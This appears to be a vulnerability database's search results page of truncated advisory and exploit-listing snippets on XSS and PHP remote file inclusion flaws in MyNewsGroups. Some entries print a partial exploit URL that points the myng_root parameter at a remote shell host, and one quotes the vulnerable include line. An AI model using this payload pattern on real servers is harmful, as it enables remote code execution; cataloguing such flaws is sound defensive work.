EUVD-2007-2320

Malware in sbrugna...

EUVD-2002-1832

Malware in sbrugna...

EUVD-2006-3343

Malware in sbrugna...

CVE-2002-1853

Cross-site scripting XSS vulnerability in MyNewsGroups 0.4 and 0.4.1 allows remote attackers to inject arbitrary web script or HTML via the subject of a newsgroup post, which is not properly handled by 1 myarticles.php, 2 search.php, 3 stats.php, or 4 standard.lib.php...

MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23646/info MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the...

MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability

No description provided by source. +-------------------------------------------------------------------- + + MyNewsGroups : v. 0.6b = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: MyNewsGroups : v. 0.6b + Venedor ..............

MyNewsGroups layersmenu.inc.php myng_root Parameter PHP Code Execution - Ver2 (CVE-2006-3966)

A code execution vulnerability has been reported in MyNewsGroups. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...

MyNewsGroups Include.PHP远程文件包含漏洞

MyNewsGroups是一款基于PHP的WEB应用程序。 MyNewsGroups不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'include'脚本对用户提交的'myngroot'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 MyNewsGroups 0.6 目前没有解决方案提供： http://mynewsgroups.sourceforge.net/ http://www.example.com/include.php?myngroot=http://shell...

Remote file inclusion

PHP remote file inclusion vulnerability in include.php in MyNewsGroups : allows remote attackers to execute arbitrary PHP code via a URL in the myngroot parameter...

CVE-2007-2325

PHP remote file inclusion vulnerability in include.php in MyNewsGroups : allows remote attackers to execute arbitrary PHP code via a URL in the myngroot parameter...

CVE-2007-2325

The CVE is a concrete PHP remote file inclusion vulnerability (CVE-2007-2325) in the MyNewsGroups project. Exploitation path: via include.php, using a URL provided in the myng_root parameter, enabling remote code execution. Affected component is include.php in MyNewsGroups; underlying cause is RF...

CVE-2007-2325

PHP remote file inclusion vulnerability in include.php in MyNewsGroups : allows remote attackers to execute arbitrary PHP code via a URL in the myngroot parameter...

MyNewsGroups &gt;&gt; RFI in include.php

Author: Carlos Sanchez,[email protected] BY : www.hackerz.ir users, ali & saeid exploit : include.php?myngroot=http://shell...

MyNewsGroups 0.6 - &#039;Include.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23646/info MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are...

MyNewsGroups 0.6 - Include.php Remote File Inclusion

MyNewsGroups 0.6 - Include.php Remote File Inclusion source: https://www.securityfocus.com/bid/23646/info MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the...

MyNewsGroups layersmenu.inc.php远程文件包含漏洞

MyNewsGroups是具有WEB界面的USENET新闻组客户端。 MyNewsGroups的lib/tree/layersmenu.inc.php文件中没有正确的过滤对myngroot参数的输入，允许攻击者可以通过包含本地或外部资源执行任意PHP代码。 漏洞相关的代码如下： ..... ?php // PHP Layers Menu 2.3.5 C 2001-2003 Marco Pratesi marco at telug dot it requireonce $myngroot."/pear/PEAR.php"; ..... MyNewsGroups MyNewsGroups =...

mynewsgroups06b.txt

+-------------------------------------------------------------------- + + MyNewsGroups : v. 0.6b = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: MyNewsGroups : v. 0.6b + Venedor ...........: http://mynewsgroups.sourceforge.n...

MyNewsGroups &lt;= 0.6b &#40;myng_root&#41; Remote Inclusion Vulnerability

+-------------------------------------------------------------------- + + MyNewsGroups : v. 0.6b = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: MyNewsGroups : v. 0.6b + Venedor ...........: http://mynewsgroups.sourceforge.n...

CVE-2006-3966

CVE-2006-3966 affects the PHP Layers Menu 2.3.5 package for MyNewsGroups :) (versions up to and including 0.6b). A PHP remote file inclusion in /lib/tree/layersmenu.inc.php allows an attacker to supply a URL via the myng_root parameter to execute arbitrary PHP code on the affected system. The CP ...

MyNewsGroups 0.6b - myng_root Remote Inclusion

MyNewsGroups 0.6b - myngroot Remote Inclusion +-------------------------------------------------------------------- + + MyNewsGroups : v. 0.6b = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: MyNewsGroups : v. 0.6b + Venedor...